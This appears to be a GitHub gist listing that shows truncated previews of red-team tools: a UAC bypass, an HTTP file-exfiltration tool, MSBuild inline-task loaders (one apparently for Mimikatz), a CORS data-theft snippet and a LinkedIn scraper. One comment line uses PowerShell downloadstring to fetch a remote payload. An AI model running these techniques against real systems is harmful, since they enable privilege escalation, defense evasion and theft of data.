This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# first: mkdir user && cd user && cp /path/to/get_gists.py . | |
# python3 get_gists.py user | |
import requests | |
import sys | |
from subprocess import call | |
user = sys.argv[1] | |
r = requests.get('https://api.github.com/users/{0}/gists'.format(user)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Evan Johnson - Misconfigured CORS and why web appsec is not getting easier - AppSecUSA 2016 | |
// Stolen from presentation above for quick reference | |
//curl https://site.com -H "Origin: https://test.com" -I | grep "Access-Control-Allow" | |
$.ajax({ | |
url: "https://site.com/some/url" | |
success: function( data ) { | |
document.write("Key: " data['SOME_VAR']); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Linq; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
using Microsoft.Win32; | |
/* | |
InstallUtil.exe C# version of Event Viewer UAC bypass |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
// httpxfil | |
// Leo Loobeek 2017 | |
// | |
// PowerShell code taken from | |
// https://github.com/EmpireProject/Empire | |
// | |
// Exfiltrate a file by encrypting and | |
// sending via HTTP/S. This was written |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'https://bytes.com/topic/access/insights/906671-rc4-encryption-algorithm-vba-vbscript | |
' Note: There are known weaknesses to RC4 and should not be relied on | |
Function RC4(byteMessage, strKey) | |
Dim kLen, x, y, i, j, temp | |
Dim s(256), k(256) | |
For a = 0 To 255 | |
s(a) = a | |
k(a) = 0 | |
Next | |
klen = Len(strKey) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes c# code. --> | |
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuilder.xml --> | |
<!-- Populate the Env Var like this or many other ways: --> | |
<!-- $env:TheThingIs = (New-Object Net.Webclient).downloadstring('http://bit.ly/2tDkg2e') --> | |
<!-- This has the advantage of keeping the assembly out of the xml on disk if it were ever recovered --> | |
<!-- This is just a simple example... MSBuild is a rich scripting engine with lots of abiltiy to customize the build process --> | |
<Target Name="Hello"> | |
<SharpLauncher > | |
</SharpLauncher> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes c# code. --> | |
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml --> | |
<Target Name="Hello"> | |
<SharpLauncher > | |
</SharpLauncher> | |
</Target> | |
<UsingTask | |
TaskName="SharpLauncher" | |
TaskFactory="CodeTaskFactory" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.IO; | |
using System.Net; | |
using System.Text; | |
using System.IO.Compression; | |
using System.Collections.Generic; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Author: Matthew Graeber (@mattifestation) | |
# Load dnlib with Add-Type first | |
# dnlib can be obtained here: https://github.com/0xd4d/dnlib | |
# Example: ls C:\ -Recurse | Get-AssemblyLoadReference | |
filter Get-AssemblyLoadReference { | |
param ( | |
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('FullName')] | |
[String] | |
[ValidateNotNullOrEmpty()] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
---PLEASE NOTE: THIS IS FOR EDUCATIONAL PURPOSES ONLY--- | |
Script to scrape linkedin contacts for a certain company or search | |
Authors - Erkin Djindjiev (@SeaErkin) | |
Ryan Bradbury (@rj4yb3) | |
Instructions - | |
1) navigate the first page of contacts | |
2) open your web browser developer tools | |
3) modify the pageLimit variable to fit the # of pages you'd like to scrape |
OlderNewer